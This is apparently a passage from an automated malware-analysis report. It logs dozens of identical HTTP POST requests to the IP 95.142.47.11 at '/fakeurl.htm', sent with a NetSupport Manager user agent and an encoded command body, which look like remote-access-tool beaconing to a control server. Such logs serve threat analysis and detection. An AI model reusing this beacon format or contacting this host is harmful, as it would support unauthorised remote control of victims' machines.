                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:30.677669048 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:30.778714895 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:30.878942013 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:30.979000092 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:31.079708099 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:31.180649996 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:31.280754089 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:31.381618977 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:31.483417988 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:31.582672119 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:31.683655024 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:31.784023046 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:31.884627104 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:31.984863043 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:32.084917068 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:32.185645103 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:32.286874056 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:32.386679888 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:32.487633944 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:32.587760925 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:32.688962936 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:32.789618969 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:32.889863968 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:32.990592003 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:33.090744972 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:33.192167997 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:33.292702913 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:33.393655062 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:33.494615078 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:33.594604969 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:33.699434996 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:33.799835920 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:33.900602102 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:34.000847101 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:34.101974964 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:34.202796936 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:34.303606987 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:34.404628992 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:34.505732059 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:34.606643915 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:34.706629992 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:34.806664944 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:34.906641960 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:35.006620884 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:35.106734991 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:35.207644939 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:35.308643103 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:35.408629894 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:35.510310888 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:35.609894037 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:35.710822105 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:35.811618090 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:35.911911011 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:36.012674093 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:36.112649918 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:36.213725090 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:36.314743042 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:36.415679932 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:36.516660929 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:36.616751909 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:36.717642069 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:36.818641901 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:36.918791056 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:37.019674063 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:37.120814085 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:37.221741915 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:37.321871042 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:37.421705008 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:37.522650957 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:37.623722076 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:37.723820925 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
